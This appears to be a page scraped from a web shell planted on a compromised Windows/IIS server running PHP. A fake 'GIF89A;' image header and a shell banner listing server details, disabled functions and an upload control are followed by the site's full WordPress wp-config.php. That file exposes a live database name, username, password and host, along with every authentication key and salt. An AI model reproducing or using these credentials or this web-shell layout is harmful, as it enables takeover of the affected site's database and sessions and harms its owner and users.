GIF89A;
Server : Microsoft-IIS/10.0 System : Windows NT HMW9050 6.2 build 9200 (Unknow Windows version Standard Edition) i586 User : fatorc ( 0) PHP Version : 5.3.28 Disable Function : escapeshellarg, escapeshellcmd, exec, passthru, proc_close, proc_open, shell_exec, system, dl, popen, php_check_syntax, php_strip_whitespace, symlink, link, openlog, apache_child_terminate Directory : e:/home/fatorc/Web/ |
Upload File : |
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://codex.wordpress.org/Editing_wp-config.php * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'fatorc2016'); /** MySQL database username */ define('DB_USER', 'fatorc2016'); /** MySQL database password */ define('DB_PASSWORD', 'fatorc2017'); /** MySQL hostname */ define('DB_HOST', 'fatorc2016.mysql.dbaas.com.br'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8mb4'); /** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', ''); /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', '&D`diw:IE[DwK|&J&P4=&&;,Q#A;*>K];sV?xfOl?IO?%ua={NL)6b?i|5f,2lk!'); define('SECURE_AUTH_KEY', '>T+CqH7%V `{^:/P>yP*Y8V##+hf#8>atZx8`fR[HJAFu}+f_Aub Qv<@j8bh>vC'); define('LOGGED_IN_KEY', 'j%?r5q o??vCVmcHj?V%;k=>Np_L0Kj65G0qCdQT_XDwW:Df.@W?-y,#dH(G[d6~'); define('NONCE_KEY', '#7tYu}fW9pp#WcA2 JjqG&H4Zia/Qv*ew,^^e|wzeZDe}DMwC)]3GFTg:icp$@ov'); define('AUTH_SALT', '7UHUj~!3dv5_RZbaEny P&S0]v3ck9P2WM?:b]9huylSS`d*>_r}|^*DH/iPSO[('); define('SECURE_AUTH_SALT', '$W4}ExF`z}[|b&A[+2!XA1:l#7wbENQpR{h1~;[UM3/oMt3xv+2+iPzt&a{PU/KG'); define('LOGGED_IN_SALT', '-wl[SSG{GzQV|t7uhba8F>~EI[lL.4r&+[(!y(8HZ,)K-Dj-fqQ|b_Y,{PEh XKe'); define('NONCE_SALT', 'cq]a<z:K5jF_)p`0O3oL0MXFsY|D_A1QXBs>94qJaV0gmK< 3vh*4kDrB8%PT# J'); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the Codex. * * @link https://codex.wordpress.org/Debugging_in_WordPress */ define('WP_DEBUG', false); /* That's all, stop editing! Happy blogging. */ /** Absolute path to the WordPress directory. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /** Sets up WordPress vars and included files. */ require_once(ABSPATH . 'wp-settings.php');